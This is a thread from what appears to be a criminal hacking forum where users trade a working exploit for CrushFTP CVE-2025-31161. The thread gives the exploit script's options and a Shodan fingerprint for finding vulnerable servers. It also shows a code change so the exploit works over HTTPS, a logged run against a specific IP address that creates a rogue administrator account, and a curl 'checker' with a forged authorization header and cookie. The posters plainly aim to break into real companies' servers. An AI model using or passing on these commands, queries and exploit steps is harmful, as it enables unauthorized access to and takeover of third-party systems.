• XSS.stack #1 – первый литературный журнал от юзеров форума

Remote CrushFTP Unauthenticated Administrative Access CVE-2025-31161

Отслеживать
pianoxltd

pianoxltd

RAID-массив
Пользователь
Регистрация
24.09.2024
Сообщения
50
Реакции
19
Гарант сделки
3
CrushFTP versions 10 before 10.8.4 and 11 before 11.3.1

Proof of Concept for CVE-2025-31161
https://github.com/Immersive-Labs-Sec/CVE-2025-31161

Код: 
usage: cve-2025-31161.py [-h] [--target_host TARGET_HOST] [--port PORT] [--target_user TARGET_USER] [--new_user NEW_USER] [--password PASSWORD]

Exploit CVE-2025-2825

options:
  -h, --help            show this help message and exit
  --target_host TARGET_HOST
                        Target host
  --port PORT           Target port
  --target_user TARGET_USER
                        Target user
  --new_user NEW_USER   New user to create
  --password PASSWORD   Password for the new user

shodan
Код: 
http.favicon.hash:-1022206565
 
pianoxltd сказал(а):
CrushFTP versions 10 before 10.8.4 and 11 before 11.3.1

Proof of Concept for CVE-2025-31161
https://github.com/Immersive-Labs-Sec/CVE-2025-31161

Код: 
usage: cve-2025-31161.py [-h] [--target_host TARGET_HOST] [--port PORT] [--target_user TARGET_USER] [--new_user NEW_USER] [--password PASSWORD]

Exploit CVE-2025-2825

options:
  -h, --help            show this help message and exit
  --target_host TARGET_HOST
                        Target host
  --port PORT           Target port
  --target_user TARGET_USER
                        Target user
  --new_user NEW_USER   New user to create
  --password PASSWORD   Password for the new user

shodan
Код: 
http.favicon.hash:-1022206565
Yes, but this script does not work on HTTPS or on port 443, which is the company's main port. If you have tried it and it works, please let me know. It does not work for me.
 
AVAX_Hacking_Group сказал(а):
Yes, but this script does not work on HTTPS or on port 443, which is the company's main port. If you have tried it and it works, please let me know. It does not work for me.
change line 29-30 http to https

Python: 
    # First request details
    warm_up_url = f"http://{target_host}:{port}/WebInterface/function/"
    create_user_url = f"http://{target_host}:{port}/WebInterface/function/"
        
        
    # First request details
    warm_up_url = f"https://{target_host}:{port}/WebInterface/function/"
    create_user_url = f"https://{target_host}:{port}/WebInterface/function/"
 
python cve-2025-31161.py --target_host 193.218.95.34 --port 443
[+] Preparing Payloads
[-] Warming up the target
[-] Target is up and running
[+] Sending Account Create Request
[+] Exploit Complete you can now login with
[*] Username: king
[*] Password: qwerty123
сколько бы я не пытался он не входит под теми логинами какие я создаю
 
checker
Bash: 
curl -k "https://ip:port/WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=0559" -H "Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/" -H "Cookie: CrushAuth=3498662122596_fUYaTtBtqskeuLjOcWvZSESqVxeL0559; currentAuth=0559"

Capture.PNG
 

Вложения

  • Capture.PNG
    Capture.PNG
    29.7 КБ · Просмотры: 10
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх